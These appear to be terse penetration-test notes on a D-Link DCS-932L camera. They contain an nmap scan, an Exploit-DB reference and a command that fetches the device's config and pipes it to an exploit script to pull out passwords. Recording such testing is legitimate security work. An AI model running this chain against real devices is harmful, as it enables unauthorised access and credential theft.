nmap -T4 -sV 10.11.0.4 -oA wan-tcp

Starting Nmap 7.60 ( https://nmap.org ) at 2022-07-08 13:22 MDT
Nmap scan report for DCS-930L (10.11.0.4)
Host is up (0.30s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE    VERSION
21/tcp  open  ftp        BusyBox ftpd (D-Link DCS-932L IP-Cam camera)
23/tcp  open  telnet     BusyBox telnetd
80/tcp  open  http       GoAhead WebServer
443/tcp open  ssl/https?
MAC Address: F0:7D:68:01:09:75 (D-Link)
Service Info: Device: webcam; CPE: cpe:/h:dlink:dcs-932l

https://www.exploit-db.com/exploits/24442

  http://<device IP address>/frame/GetConfig

curl http://10.11.0.4/frame/GetConfig | python2 dcs901l-edb24442.py | grep -i pass


